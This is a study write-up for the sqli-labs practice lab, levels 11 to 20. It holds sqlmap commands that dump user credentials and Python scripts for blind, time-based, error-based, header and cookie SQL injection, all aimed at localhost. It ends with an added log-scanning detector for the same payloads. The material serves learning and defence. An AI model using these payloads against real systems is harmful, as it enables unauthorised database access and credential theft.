sqli-labs (Less-11 to Less-20) scripts and sqlmap notes

Supplementary sqlmap notes

-r  loads a raw HTTP request from a file (the saved POST request supplies the body and headers)
-p  restricts testing to the named parameter

Less-11 (an ordinary POST form)

Load the saved POST request file and get the parameters

sqlmap.py -r "C:\Users\丷木丷\Desktop\less-11.txt"

Using that parameter, get the database names

sqlmap.py -r "C:\Users\丷木丷\Desktop\less-11.txt" -p uname --dbs

Get the usernames and passwords

sqlmap.py -r "C:\Users\丷木丷\Desktop\less-11.txt" -p uname -T "users"  -C "username","password" --dump

Script: find the current database name (boolean-based blind injection)

import requests  # simpler than urllib.request/urllib.parse

name = ""
url = "http://127.0.0.1/sqli/Less-11/"
d = list('abcdefghijklmnopqrstuvwxyz0123456789@_.{}?!')
# injected field: the condition is true only when the i-th character of database() is j
inn = "1' or 1=1 and mid((database()),%s,1)='%s'#"
for i in range(1, 30):
    for j in d:
        # form fields as a dict
        data = {'uname': inn % (i, j), 'passwd': '', 'submit': 'Submit'}
        # send the POST request
        response = requests.post(url, data=data)
        # read the response body
        t = response.text
        if t.find('Login') > 0:
            name += j
            print(j)
            break  # character found, move on to the next position
print(name)

Result

Less-12

uname=n") or 1=1 #, everything else as in Less-11

Less-13 (time-based blind injection)

Get the id and username

sqlmap.py -r "C:\Users\丷木丷\Desktop\less-13.txt" -D "security" -T "users" -C "id","username" --dump

Script: get the username where id=3, using time-based blind injection

import requests
import time

name = ""
url = "http://127.0.0.1/sqli/Less-13/"
d = list('abcdefghijklmnopqrstuvwxyz')
# injected field: sleep(1) fires only when the i-th character of the username is j
inn = "n') or if(mid((select username from security.users where id=3),%s,1)='%s',sleep(1),0)#"
for i in range(1, 10):
    for j in d:
        # form fields as a dict
        data = {'uname': inn % (i, j), 'passwd': '', 'submit': 'Submit'}
        # time the POST request; a delayed response means the guess was right
        time1 = time.time()
        response = requests.post(url, data=data)
        time2 = time.time()
        if time2 - time1 > 1:
            name += j
            print(j)
            break  # character found, move on to the next position
print(name)

Result

Less-14

Same time-based blind injection as Less-13, but note the quote has to be escaped as \"

Script: get the database name

import requests
import time

name = ""
url = "http://127.0.0.1/sqli/Less-14/"
d = list('abcdefghijklmnopqrstuvwxyz')
# injected field: this level quotes with ", so the closing quote is written as \"
inn = "n\" or if(mid((database()),%s,1)='%s',sleep(1),0)#"
for i in range(1, 10):
    for j in d:
        # form fields as a dict
        data = {'uname': inn % (i, j), 'passwd': '', 'submit': 'Submit'}
        # time the POST request; a delayed response means the guess was right
        time1 = time.time()
        response = requests.post(url, data=data)
        time2 = time.time()
        if time2 - time1 > 1:
            name += j
            print(j)
            break  # character found, move on to the next position
print(name)

Result

Less-15 (injection point in the password field)

Same as before, but the injection point moves to the password field

Script: get the database name

import requests
import time

name = ""
url = "http://127.0.0.1/sqli/Less-15/"
d = list('abcdefghijklmnopqrstuvwxyz')
# injected field
inn = "n' or if(mid((database()),%s,1)='%s',sleep(1),0)#"
for i in range(1, 10):
    for j in d:
        # form fields as a dict; the injection point is the password field
        data = {'uname': '', 'passwd': inn % (i, j), 'submit': 'Submit'}
        # time the POST request; a delayed response means the guess was right
        time1 = time.time()
        response = requests.post(url, data=data)
        time2 = time.time()
        if time2 - time1 > 1:
            name += j
            print(j)
            break  # character found, move on to the next position
print(name)

Result

Less-16

uname=addmin&passwd=ad" or 1=1 #, note the \", everything else as in Less-15

Less-17 (updatexml error-based injection)

Note the \' escaping

Script: query the database name

import requests

url = "http://127.0.0.1/sqli/Less-17/"
# the injection goes in the password field; the ' inside a '-quoted Python string is written as \'
data = {'uname': 'admin',
        'passwd': 'dadad\' and updatexml(1,concat(0x7e,(database())),1)#',
        'submit': 'Submit'}
r = requests.post(url, data=data)
t = r.text
print(t)

Result: the database name appears in the error message

Less-18 (User-Agent injection)

Script: POST request with a modified User-Agent header (grumbling: fixing the escaping drove me up the wall = =)

import requests

url = "http://127.0.0.1/sqli/Less-18/"
# every ' inside the '-quoted header value must be escaped as \'
u = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0\'or updatexml(1,concat(0x7e,(database())),1)or \'1\'=\'1'}
data = {'uname': 'admin', 'passwd': 'admin', 'submit': 'Submit'}
r = requests.post(url, data=data, headers=u)
t = r.text
print(t)

Result

Less-19 (Referer injection)

Script: same as Less-18, just switch the header to Referer; the same escaping is needed

import requests

url = "http://127.0.0.1/sqli/Less-19/"
# the payload is appended to the Referer value; ' is escaped as \' as in Less-18
u = {'Referer': 'http://127.0.0.1/sqli/Less-19/\'or updatexml(1,concat(0x7e,(database())),1)or \'1\'=\'1'}
data = {'uname': 'admin', 'passwd': 'admin', 'submit': 'Submit'}
r = requests.post(url, data=data, headers=u)
t = r.text
print(t)

Result

Less-20 (Cookie injection)

Inject into the value in the cookie with ' #

Script

import requests

url = "http://127.0.0.1/sqli/Less-20/"
# the payload is placed in the Cookie header's uname value
u = {'Cookie': 'uname=1\' union select 1,2,group_concat(concat_ws(\'-\',id,username,password)) from users#'}
data = {'uname': 'admin', 'passwd': 'admin', 'submit': 'Submit'}
r = requests.post(url, data=data, headers=u)
t = r.text
print(t)

Result: couldn't get it to work; probably a version issue, unresolved for now
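Seen from the defending side, the injection points worked through above (POST fields in Less-11 to 17, then User-Agent, Referer and Cookie in Less-18 to 20) all leave recognisable shapes in request logs. The following is an added example, not part of the original notes: it scans constructed request records for those shapes and flags a source that fires the per-character probes the blind scripts send (one request per position and candidate character). The record layout, field names and the 10.0.0.x addresses are constructed for the example.

```python
import re

# Signatures for the payload shapes used across Less-11 to Less-20 above.
SIGNATURES = [
    ("quote-break", re.compile(r"""['"]\)?\s*or\b""", re.I)),   # 1' or ..., n') or ..., ad" or ...
    ("char-probe",  re.compile(r"\b(?:mid|substr|substring)\s*\(", re.I)),
    ("time-delay",  re.compile(r"\bsleep\s*\(", re.I)),
    ("error-xpath", re.compile(r"\b(?:updatexml|extractvalue)\s*\(", re.I)),
    ("union",       re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
]
# Where Less-11 to 20 take tainted input: the POST fields plus these headers.
WATCHED_HEADERS = ("User-Agent", "Referer", "Cookie")

def scan_request(req):
    """Return [(location, label), ...] for one request record.
    Record shape (constructed for this example): {"src", "form", "headers"}."""
    hits = []
    fields = [("form:" + k, v) for k, v in req.get("form", {}).items()]
    fields += [("header:" + h, req.get("headers", {}).get(h, "")) for h in WATCHED_HEADERS]
    for loc, value in fields:
        for label, rx in SIGNATURES:
            if rx.search(value):
                hits.append((loc, label))
    return hits

def blind_enumeration_sources(reqs, threshold=20):
    """The blind scripts send one request per (position, candidate char), so a
    source with many char-probe hits is enumerating; return those sources."""
    counts = {}
    for r in reqs:
        if any(label == "char-probe" for _, label in scan_request(r)):
            counts[r["src"]] = counts.get(r["src"], 0) + 1
    return sorted(src for src, n in counts.items() if n >= threshold)

# Constructed sample traffic: a normal login, Less-18/20 header payloads, a 26-request probe burst.
SAMPLE = [
    {"src": "10.0.0.5", "form": {"uname": "admin", "passwd": "admin"}, "headers": {}},
    {"src": "10.0.0.9", "form": {"uname": "admin", "passwd": "admin"},
     "headers": {"User-Agent": "Mozilla/5.0' or updatexml(1,concat(0x7e,(database())),1) or '1'='1"}},
    {"src": "10.0.0.9", "form": {"uname": "admin", "passwd": "admin"},
     "headers": {"Cookie": "uname=1' union select 1,2,group_concat(username) from users#"}},
] + [
    {"src": "10.0.0.7", "headers": {},
     "form": {"uname": "1' or 1=1 and mid((database()),1,1)='%s'#" % c, "passwd": ""}}
    for c in "abcdefghijklmnopqrstuvwxyz"
]

if __name__ == "__main__":
    for r in SAMPLE[:4]:
        print(r["src"], scan_request(r))
    print("enumerating sources:", blind_enumeration_sources(SAMPLE))
```

The signatures only catch the literal shapes used in these levels; in a real deployment the durable fix is parameterised queries on the server, with this kind of matching used as a detection aid rather than a blocker.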